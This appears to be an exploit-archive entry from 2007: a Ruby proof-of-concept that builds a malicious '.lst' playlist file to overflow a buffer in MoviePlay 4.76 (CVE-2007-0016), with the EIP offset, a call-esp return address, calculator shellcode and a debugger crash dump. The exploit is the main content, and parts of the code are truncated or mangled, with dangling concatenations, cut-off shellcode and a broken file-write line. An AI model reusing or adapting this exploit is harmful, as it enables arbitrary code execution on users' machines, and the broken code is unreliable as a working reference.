MoviePlay 4.76 - '.lst' Local Buffer Overflow

Related Vulnerabilities: CVE-2007-0016  
Publish Date: 08 Jun 2007
Author: n00b

                #!/usr/bin/env ruby
#MoviePlay 4.76 .lst file Local buffer over-flow.
#Credit to n00b for writing poc code..Pmsl
#Tested on :Win xp sp2 eng.
#Vendor web site: MoviePlay 4.76
#Buffer-over flow reported : Jan 02 2007 12:00AM
#Credit goes to Parvez Anwar for finding the bug.
#MoviePlay is prone to a remote buffer-overflow vulnerability because it
#fails to properly bounds-check user-supplied input before copying it to
#an insufficiently sized memory buffer. Exploiting this vulnerability
#allows attackers to execute arbitrary machine code in the context of
#the affected application..
#I looked all over for a poc code or even some
#thing to back the claim up nothing was found
#And as i was board so i decided to write a poc for this.
#1053byte's next 4 bytes over write eip then esp was pointing
#4 bytes after no need for any nop sled or any-thing...
#1053 bytes of buffer --> 4 bytes ret --> 351 shell-code --> 592 bytes of buffer.
#File is 2000 byte's.
# ..\\Debug info//..
#(664.3b0): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=ffffffff ebx=00000000 ecx=41414141 edx=0048ef90 esi=00b00048 edi=00000001
#eip=41414141 esp=0012ec78 ebp=41414141 iopl=0 nv up ei ng nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010296
#41414141 ?? ???
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre

Header1 = "\x5b\x4d\x6f\x76\x69\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c"+

bof1 = 'A'* 1053 #1053 bytes to our eip is over-writen

ret = "\x45\x15\xF6\x77" # call esp in Shlwapi.dll 0x77F61545..
#Calc shell-code.
shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ #351 bytes

bof2 = 'B'* 592 #592 fil the rest of the file to make it to 2000 bytes.

Header2 = "\x2e\x6d"+

lst_file = Header1 + bof1 + ret + shell + bof2 + Header2 "Exploit.lst","w") do |the_file| #Write file
the_file.puts (lst_file)
print 'File was created success-fully..!!'

# [2007-06-08]